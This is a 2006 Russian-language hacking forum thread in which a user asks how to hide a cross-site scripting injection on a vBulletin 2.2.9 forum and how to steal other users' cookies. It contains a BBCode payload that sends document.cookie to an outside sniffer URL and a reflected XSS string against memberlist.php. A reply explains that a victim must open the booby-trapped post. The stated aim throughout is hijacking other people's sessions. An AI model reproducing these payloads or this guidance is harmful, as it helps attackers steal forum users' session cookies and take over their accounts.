Как можно зашифровать инъекцию на форум так чтобы ее видно не было?

Discussion in 'Песочница' started by ПсиХ, 16 Jan 2006.

  1. ПсиХ

    ПсиХ New Member

    Joined:
    13 Jan 2006
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    Есть форум vBulletin 2.2.9
    Судя по всему админы не поленились и закрыли (казалось бы все возможные дыры).

    Пробовал множество инъекций в сообщениях, но они все видны или видны на половину

    Пример:

    Вставлял:

    HTML:
    [url]http://www.[url=http://wj.com/style=display:none,background:url(javascript:docum  ent.images[1].src="http://antichat.ru/cgi-bin/s.jp  g?"+document.cookie,) ]wj[/url][/url]
    Форум выводил:

    HTML:
    [url]http://www..src="http://antichat.ru/cgi-bin/s.jp g?"+document.cookie,) ]wj[/url]
    как раз то что должно быть скрыто он и выводит!

    Хотелось бы побольше узнать про инъекции, как и что надо менять чтобы ее видно не было.

    Заранее спасибо.
     
    2 people like this.
  2. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    Если он выводит тебе сообщение, т.е. тот код что ты ввел, то значит он (код) не сработал => скрытие тебе не поможет, результатом работы кода (обычно) является алерт, или спи**ивание куков, и это никак не отображается... т.е. ты в сам код внедряешь свой код... так что те коды у тебя не работает.
     
  3. ПсиХ

    ПсиХ New Member

    Joined:
    13 Jan 2006
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0

    Хорошо, а как это обойти ?
     
  4. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    Это нельзя "обойти", если код не работает - значит уже пропатчили, ищи другой код или уязвимости в этой версии форума. Поищи баги на СекЛабе(http://securitylab.ru)
     
  5. ПсиХ

    ПсиХ New Member

    Joined:
    13 Jan 2006
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    на секлабе нашел прочку,

    вот:
    Code:
    memberlist.php?ХХХs= ХХХ 23c37cf1af5d2ad05f49361b0407 ХХ ad9e&what=">"<Script>javascript:alert(document.cookie)</Script>
    помог мне добыть мои же кукис, когда я был на форуме и ввел это в броузер!

    а как достать нужные кукис пока не знаю (есть предложения ? )
     
    #5 ПсиХ, 16 Jan 2006
    Last edited: 16 Jan 2006
  6. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    Прально, чтобы добыть чужие кукис нужно чтобы другой чел открыл тему/пост с кодом, который пи*дит куки...
     
  7. ПсиХ

    ПсиХ New Member

    Joined:
    13 Jan 2006
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0

    Дык чтобы использовать и получать чужие кукис это

    Code:
    http://www.vbulletin.com/forum/memberlist.php? Х s Х = Х 23c37cf1af5d2ad05f49361b0407 ХХХ ad9e &what=">"<Scr*ipt>javascript:alert(document.cookie)</Scr*ipt>
    нужно как нибудь преобразовать, ведь эта фактически ссылка а не инъекция или еще что! и работает она на добавлении кода с получением кукисов
     
  8. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    Кукисы берутся из клиента-броузера пользователя а не сервера, насколько я знаю.
     
  9. ПсиХ

    ПсиХ New Member

    Joined:
    13 Jan 2006
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0

    правильно, но эту ссылку должна как я понимаю открывать Жертва + ссылку надо модернизировать чтоб на снифер снимать кукисы
     
  10. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    Ищи другой способ.
    //модерам
    ЧТО за тупая привычка стирать нужные посты?